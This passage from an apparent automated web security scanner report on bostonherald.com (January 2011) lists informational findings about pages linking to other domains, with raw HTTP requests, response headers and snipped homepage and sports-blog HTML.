<a href="http://www.bostonherald.com/users/register?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/enews177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="/store/">
<img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/store/images/sportsHistory177.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/jobfind177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.shoplocal.com/bostonherald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/shopLocal177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/about/home_delivery/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/homeDelivery177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.collegeanduniversity.net/herald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/college177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/"><img src="http://cache.heraldinteractive.com/blogs/news/city_desk_wired/wp-content/uploads/2011/01/roof-collapse-in-lynn.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/lifestyle/fork_lift/?p=3679"><img src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1170.snc4/154264_180150921996846_120515841293688_635022_7871232_n.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/entertainment/disney_days/index.php/2011/01/26/castaway-cay-a-great-beach-stopover/"><img src="http://cache.heraldinteractive.com/blogs/entertainment/disney_days/wp-content/uploads/2011/01/castaway11111.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/"><img src="http://multimedia.heraldinteractive.com/images/0075a6139f_ltpvanh10292007.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/"><img src="http://cache.heraldinteractive.com/blogs/sports/red_sox/wp-content/uploads/2011/01/a76f88_010611crawfordnl111.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/celtics/index.php/2011/01/28/a-thorough-breakdown-of-kobe-bryants-supposed-clutchness/"><img src="http://cache.heraldinteractive.com/blogs/sports/celtics/wp-content/uploads/2011/01/kobe.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/entertainment/the_assistant/?p=3065"><img src="http://www.hollywoodbackwash.com/wp-content/uploads/2010/12/lydia-and-jeff.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/mediaBiz/index.php/2011/01/28/the-holiday-radio-ratings-rundown/"><img src="http://cache.heraldinteractive.com/blogs/news/mediaBiz/wp-content/uploads/2011/01/matty2.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/2011/01/28/live-from-honolulu-brandon-meriweather-and-darrelle-revis-launch-friendly-fire/"><img src="http://cache.heraldinteractive.com/blogs/sports/rap_sheet/wp-content/uploads/2011/01/2010112120101121395900.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1312690"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/eb38f1_ltpMankins012811.jpg"></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('galleries/index.php?gallery_id=9','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/front_01282011.jpg" alt="" /></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('/galleries/index.php?gallery_id=10','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/Sports_01282011.jpg" alt="" /></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
<div>+ <a href="http://coupons.smartsource.com/web/index.aspx?Link=5ZTSY3SFTCCTE">Money Saving Coupons</a>
...[SNIP]...
<div>+ <a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<div>+ <a href="http://www.people2people.com/?connect=boshrld&amp;page=login">Personals</a>
...[SNIP]...
<div>+ <a href="http://www.shoplocal.com/bostonherald/">Great Shopping&nbsp;Deals</a>
...[SNIP]...
<div>+ <a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<a href="/about/electronic_edition/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/homepage/sampleFrontPage120.jpg" style="border: 1px #333 solid" /></a>
...[SNIP]...
<a
href="/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/3057c6_Plow_01282011.jpg" alt="PILING UP: Crews work to clear mounds of snow in Kenmore Square yesterday." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/weather/"><img src="http://cache.heraldinteractive.com/images/siteImages/weather/35.gif" /></a>
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/19.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/02.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/03.gif" width="57" height="48"/><br />
...[SNIP]...
<a
href="/sports/basketball/celtics/view/20110128shaquille_oneal_earns_fresh_shot_eyes_return_tonight_in_phoenix/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/c2ecb2_kev_01282011.jpg" alt="WELL WITHIN REACH: Kevin Garnett tries to slap the ball away from the Trail Blazers&#x2019; LaMarcus Aldridge during last night&#x2019;s 88-78 Celtics victory in Portland." /></a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/schedule.aspx?team=028,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&amp;page=mlb/teams/028/individual.aspx?team=028">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/sched.aspx?id=077">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/teamstat.aspx?id=077">Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/schedule.aspx?team=092,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/tmstat.aspx?id=092">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/schedule.aspx?team=121,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/indstats.aspx?team=121">Ind. Stats</a>
...[SNIP]...
<a
href="/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/8345b6_Statham_01282011.jpg" alt="AUTO PILOT: Jason Statham kicks more butt than you can shake a wrench at in &#x2018;The Mechanic,&#x2019; a remake of the Charles Bronson film directed by Michael Winner." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/entertainment/arts_culture/view.bg?articleid=1312261&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/39b0d8_garden_01272011.jpg" border="0"
width="207" height="181" caption="Forever young" />
</a>
...[SNIP]...
<a
href="/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/a37654_sheen_01282011.jpg" alt="Charlie Sheen." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312550&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/bcd2f7_jul_01282011.jpg" border="0"
width="207" height="181" caption="Moore&rsquo;s the merrier at Hasty festivities" />
</a>
...[SNIP]...
<a
href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG" alt="" /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=also">
...[SNIP]...
<div id="busTabsHp" style="width:180px; margin:0 auto;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img src="http://cache.heraldinteractive.com/images/siteImages/jobfind/homepageHotJobsSearch.gif"></a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.homefind.com/?srvc=home&position=also">Homefind</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="featuredListHF_logo">
<img src="http://multimedia.heraldinteractive.com/misc/alsoIn/homefind/HF5728980.jpg" />
    </div>
   <span class="bold">
    <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">
1212 North Main Street,<br>
...[SNIP]...
</span>
        <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">View listing</a>
...[SNIP]...
</div>    
<a class="orange" href="http://www.homefind.com">Search Homes</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.homefind.com/post-property/">Post a Property</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.homefind.com/for-agents/">For Agents</a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.carfind.com/?srvc=home&position=also">Carfind</a>
...[SNIP]...
<a
href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/268649_ford012811.jpg" alt="The Ford logo is seen on the automaker&rsquo;s headquarters in this Oct. 26, 2009 file photo taken in Dearborn, Mich." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/">Search Cars</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/sellCar.bg">Sell a Car</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://boston30.autochooser.com/results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp">Find a dealer</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

7.2. http://www.bostonherald.com/blogs/sports/rap_sheet/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/sports/rap_sheet/

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /blogs/sports/rap_sheet/?srvc=home&position=recent HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:48:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/sports/rap_sheet/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 115370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<meta name="SUBSECTION" content="Blogs" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/universal.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/tabbed.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/index.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/dropdown.css" media="screen,projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/subnavigation.css" media="screen,projection" />
   
   <link rel="stylesheet" type="text/css" href="/CSS/blogs.css" media="screen,projection" />
   
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/sports.css" media="screen,projection" />

   
   <link rel="stylesheet" type="text/css" href="/CSS/blogsInside.css" media="screen,projection" />
<link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/version5.0/patriots.css" media="screen,projection" />
   
<script type="text/javascript" language="JavaScript">
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<a href="http://www.bostonherald.com/sports/football/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="90px" width:"200px" alt="Blogs" /></a>
...[SNIP]...
div id="carfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a class="displayBlock" href="http://www.carfind.com"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Carfind" />Carfind</a>
...[SNIP]...
iv id="homefind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a class="displayBlock" href="http://www.homefind.com"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Homefind" />Homefind</a>
...[SNIP]...
<a class="displayBlock" href="/jobfind/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Jobfind" />Jobfind</a>
...[SNIP]...
<a href="/blogs/news/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
News &amp; Business Blogs</a>
...[SNIP]...
<a href="/blogs/sports/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
Sports Blogs</a>
...[SNIP]...
<a href="/blogs/entertainment/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
Entertainment Blogs</a>
...[SNIP]...
<a href="/blogs/lifestyle/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
Lifestyle Blogs</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/xmlgrey.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
</strong>. <a href="http://bcove.me/6oguf24t"><u>
...[SNIP]...
<p><object id="flashObj" width="486" height="412" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,47,0">
<param name="movie" value="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" />
...[SNIP]...
<param name="allowScriptAccess" value="always" /><embed src="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" bgcolor="#FFFFFF" flashVars="videoId=767806748001&#038;playerID=84359688001&#038;playerKey=AQ~~,AAAAE6Rs9lk~,SN2uQ1cpwugime4djplD8tTayQcrFkg9&#038;domain=embed&#038;dynamicStreaming=true" base="http://admin.brightcove.com" name="flashObj" width="486" height="412" seamlesstabbing="false" type="application/x-shockwave-flash" allowFullScreen="true" swLiveConnect="true" allowScriptAccess="always" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"></embed>
...[SNIP]...
</strong>is more than a football player. He&#8217;s a celebrity, too, selling <a href="http://www.google.com/url?sa=t&amp;source=web&amp;cd=1&amp;ved=0CBMQFjAA&amp;url=http%3A%2F%2Fwww.bostonherald.com%2Fblogs%2Fsports%2Frap_sheet%2Findex.php%2F2010%2F11%2F30%2Fpatriots-qb-tom-brady-now-endorsing-the-boots-my-wife-wears%2F&amp;rct=j&amp;q=Rap%20Sheet%20BRady%20Uggs&amp;ei=NANDTY_ZOcOB8gaSlu24AQ&amp;usg=AFQjCNFw3KIS_t1eB_Vew-79zoo6yD1CBg&amp;sig2=WBrzzR3H0XX0Q3gXTwFkzQ&amp;cad=rja">everything from the same shoes</a>
...[SNIP]...
<strong><a href="http://www.imageyenation.com/images/blog-gallery/kylie_ugg_boots.jpg">The Banktress</a>
...[SNIP]...
<p>He&#8217;s a pretty powerful athlete. <a href="http://images.businessweek.com/slideshows/20110124/power-100-2011/slides/2">Recently, Business Week Magazine released a list of exactly how powerful</a>
...[SNIP]...
<p><a href="http://images.businessweek.com/slideshows/20110124/power-100-2011/slides/6"><u>
...[SNIP]...
hat&#8217;s where this comes in. Want to see some of the Senior Bowl&#8217;s best pass-rushers battle some of its best offensive linemen? Cool. With my new-and-improved Flip camera, I got you covered. <a href="http://bcove.me/jq9h39r3"><u>
...[SNIP]...
<p><object id="flashObj" width="486" height="412" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,47,0">
<param name="movie" value="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" />
...[SNIP]...
<param name="allowScriptAccess" value="always" /><embed src="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" bgcolor="#FFFFFF" flashVars="videoId=766823050001&#038;playerID=84359688001&#038;playerKey=AQ~~,AAAAE6Rs9lk~,SN2uQ1cpwugime4djplD8tTayQcrFkg9&#038;domain=embed&#038;dynamicStreaming=true" base="http://admin.brightcove.com" name="flashObj" width="486" height="412" seamlesstabbing="false" type="application/x-shockwave-flash" allowFullScreen="true" swLiveConnect="true" allowScriptAccess="always" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"></embed>
...[SNIP]...
</strong>, the director of football operations of Perennial Sports and Entertainment, <a href="http://twitter.com/#!/RapSheet/statuses/30752231791796225">said as much in a Tweet</a>
...[SNIP]...
<p><a href="http://sports.espn.go.com/ncf/player/profile?playerId=235808">Sanzenbacher shares several characteristics</a>
...[SNIP]...
gn="right" width="256" height="256" />Earlier today, the NFL offices hosted 10 reporters for a meeting breaking down various aspects of the impending labor disasterbacle. Alas, I wasn&#8217;t invited. <a href="http://profootballtalk.nbcsports.com/2011/01/27/nfl-stresses-immediate-consequences-of-possible-lockout/">But Pro Football Talk&#8217;s<strong>
...[SNIP]...
<p>The league, <a href="http://twitter.com/#!/greggrosenthal/statuses/30718247296835584">though people such as NFL chief negotiator <strong>
...[SNIP]...
e="RB senior bowl" alt="RB senior bowl" align="right" width="256" height="129" />Of all the holes the Patriots have looking toward 2011, the spot at running back is kind of undercover. They did have a <a href="http://www.google.com/url?sa=t&amp;source=web&amp;cd=1&amp;ved=0CBcQFjAA&amp;url=http%3A%2F%2Fwww.bostonherald.com%2Fblogs%2Fsports%2Frap_sheet%2Findex.php%2F2011%2F01%2F14%2Fwhy-is-patriots-rb-benjarvus-green-ellis-always-so-positive-and-links%2F&amp;rct=j&amp;q=Rap%20Sheet%20Green-Ellis%20positive%20yards&amp;ei=vXxBTYS6NIPpgQfr08XMAQ&amp;usg=AFQjCNFs93srIrRIMWcjlJNqetsJyngKoA&amp;sig2=dpufrHU-q6YaX7UMvpfX-Q&amp;cad=rja">1,000-yard rusher in<strong>
...[SNIP]...
<font class=bodyFont color=#333333>
   <img src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/rap_sheet.gif">
   <div style="position:absolute; top:25px; right:15px">
...[SNIP]...
<a href=http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/feed/><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/rssGrey11.gif" border=0>RSS Feed</a>
...[SNIP]...
<p>
   <img src="http://cache.heraldinteractive.com/images/siteImages/reporters/rapoport_50.jpg" style="float:left; padding:0 3px 5px 0">
Patriots beat reporter <b>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/siteImages/reporters/karen_guregian.gif" style="float:left; padding:0 3px 5px 0">    
    <b>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/category/discovering-devin/"><img style="border: 1px #666 solid;" src="http://cache.heraldinteractive.com/images/version5.0/site_images/sports/discovering_devin/McCourty_310x100.jpg" /></a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

7.3. http://www.bostonherald.com/business/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /business/?srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
